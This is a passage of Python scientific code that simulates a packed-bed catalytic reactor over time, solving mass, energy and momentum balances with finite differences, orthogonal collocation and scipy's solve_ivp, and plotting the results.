SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
### dimensionless numbers ###
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
### transfer coefficient ###
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
"OrCoClassSetRes": OrCoClassSetRes
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
# ode call
# method [1]: LSODA, [2]: BDF, [3]: Radau
# options
solverOptions = {
"atol": 1e-7
}
sol = solve_ivp(PackedBedReactorClass.modelEquationM8,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
# dataYs2 = np.array([dataYs[varNoCon:varNoLayerT, -1]])
# 2d matrix
# dataYs2_Reshaped = np.reshape(
# dataYs2, (1, varNoRows, varNoColumns))
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
ssdataLists = [ssdataList[0:compNo],
ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle, ssdataLists)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM8(t, y, reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams):
"""
model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constat pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0, feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# R ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constat pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, T0, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa = rmtUtil.calRealDiLessValue(Ts_r, T0, "TEMP")
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = SoThCoMix*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
